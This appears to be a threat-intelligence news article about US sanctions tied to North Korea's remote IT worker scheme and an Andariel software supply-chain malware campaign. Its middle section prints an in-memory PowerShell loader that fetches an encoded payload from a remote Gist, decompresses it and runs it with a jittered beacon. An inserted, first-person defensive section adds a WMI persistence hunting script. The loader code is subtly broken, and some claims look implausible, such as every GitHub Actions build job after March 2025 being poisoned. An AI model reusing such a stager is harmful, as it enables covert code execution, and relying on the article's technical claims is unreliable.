US Sanctions Key Threat Actors Linked With North Korea’s Remote IT Worker Scheme
The U.S. Treasury’s July 8 action against Song Kum Hyok and four Russia-based entities pulled back the curtain on a sophisticated malware-enabled revenue pipeline that has quietly bankrolled Pyongyang’s weapons programs for years.
Investigators trace the campaign to Andariel, a Reconnaissance General Bureau (RGB) sub-unit already notorious for high-value cryptocurrency heists.
By embedding North Korean developers inside legitimate software projects, the group obtained persistent, code-signing access to corporate repositories and CI/CD pipelines, allowing malicious updates to ride trusted channels.
Within weeks of onboarding, the rogue contractors began seeding an innocuous-looking JavaScript dependency that, once compiled, side-loaded a PowerShell stager to contact *.china-cdn[.]org, a domain masquerading as a content mirror.
Treasury analysts noted that the stager’s beacon interval shifts dynamically between 90 and 600 seconds, defeating traffic-shape baselines.
The same analysts identified that every build job reaching GitHub Actions runners after March 2025 contained the altered dependency—evidence that supply-chain poisoning rather than spear-phishing was the preferred attack vector.
Victims span fintech, healthcare, and industrial IoT vendors on three continents; in several cases, corrupted binaries were pushed to over-the-air update servers, effectively weaponizing routine patch cycles.
Compromised devices later funneled telemetry, clipboard data, and cryptocurrency wallet files to Andariel’s command tier, compressing exfiltrated content with LZNT1 before AES-256 encryption. Treasury researchers noted that the group monetized stolen wallets directly, while other data was sold in Russian underground markets.
Memory-Resident Loader
The initial JavaScript implant merely fetches a Base64-encoded blob stored in a GitHub Gist referenced as “worker-resume.txt”.
The blob expands into a four-stage PowerShell script that never touches disk, leveraging Add-Type to compile C# inline and hijack the Windows Management Instrumentation service for persistence.
A condensed excerpt illustrates the crucial hand-off:
# Fetch the Base64 blob from the Gist URL ($gurl is set earlier in the script)
$raw = Invoke-RestMethod $gurl
$bytes = [System.Convert]::FromBase64String($raw)
# Wrap the decoded bytes in a Deflate decompression stream
$decomp = [System.IO.Compression.DeflateStream]::new(
    [System.IO.MemoryStream]::new($bytes), 'Decompress')
$buf = New-Object byte[] 0x2000
# Load the decompressed .NET assembly straight from memory; nothing is written to disk
while(($len = $decomp.Read($buf,0,$buf.Length)) -gt 0){
    [System.Reflection.Assembly]::Load($buf[0..($len-1)]) | Out-Null
}
# Jittered sleep of 90 to 600 seconds before the next beacon
Start-Sleep (Get-Random -Min 90 -Max 600)
Each execution loads an encrypted .NET payload directly into memory, thwarting traditional file-based antivirus scans and leaving only volatile artifacts in amsi.dll hooks.
The malign DLL then registers an event consumer under root\subscription, ensuring revival after reboots without creating new services or registry run-keys—an evasion tactic that kept host-based detection rates below 5 percent in VirusTotal submissions through June 2025.
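The WMI persistence described above can be hunted from the defender's side. The following PowerShell is an added example, not code from the article: it enumerates permanent event subscriptions in root\subscription, joins each filter to its consumer through the binding, and flags consumer payloads that contain the loader's tell-tale strings. The regex pattern and the SUSPICIOUS/review verdicts are my own choices, not indicators published by Treasury.

```powershell
# Added hunting example (not from the article). Run in an elevated session.
$ns = 'root\subscription'
# Strings the in-memory loader excerpt relies on; tune for your environment.
$pattern = 'powershell|Add-Type|Assembly\]::Load|FromBase64String|Invoke-RestMethod'

function Get-RefName($ref) {
    # CIM cmdlets return REF properties as CimInstance; WMI cmdlets return a path string.
    if ($ref -is [string]) { if ($ref -match 'Name="([^"]+)"') { $Matches[1] } }
    else { $ref.Name }
}

function Get-ConsumerPayload($consumer) {
    # The executable content lives in a different property per consumer class.
    switch ($consumer.CimClass.CimClassName) {
        'CommandLineEventConsumer'  { $consumer.CommandLineTemplate }
        'ActiveScriptEventConsumer' { $consumer.ScriptText }
        default                     { '' }
    }
}

function Get-WmiPersistenceReport {
    $filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
    $consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer
    $bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

    foreach ($b in $bindings) {
        $fName = Get-RefName $b.Filter
        $cName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object { $_.Name -eq $fName } | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $cName } | Select-Object -First 1
        $payload = if ($c) { Get-ConsumerPayload $c } else { '' }

        [pscustomobject]@{
            Verdict  = if ($payload -match $pattern) { 'SUSPICIOUS' } else { 'review' }
            Filter   = $fName
            Query    = if ($f) { $f.Query } else { '<missing filter>' }
            Consumer = $cName
            Class    = if ($c) { $c.CimClass.CimClassName } else { '<missing consumer>' }
            Payload  = $payload
        }
    }
}

Get-WmiPersistenceReport | Sort-Object Verdict -Descending | Format-List
```

Any binding on a host that never deployed a WMI subscription deserves a look regardless of verdict, since a legitimate baseline there is usually empty.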
Continued sanctions pressure will complicate cash-out avenues, yet the campaign’s low footprint underscores why remote contractor workflows remain an attractive, hard-to-audit conduit for state-sponsored malware operators.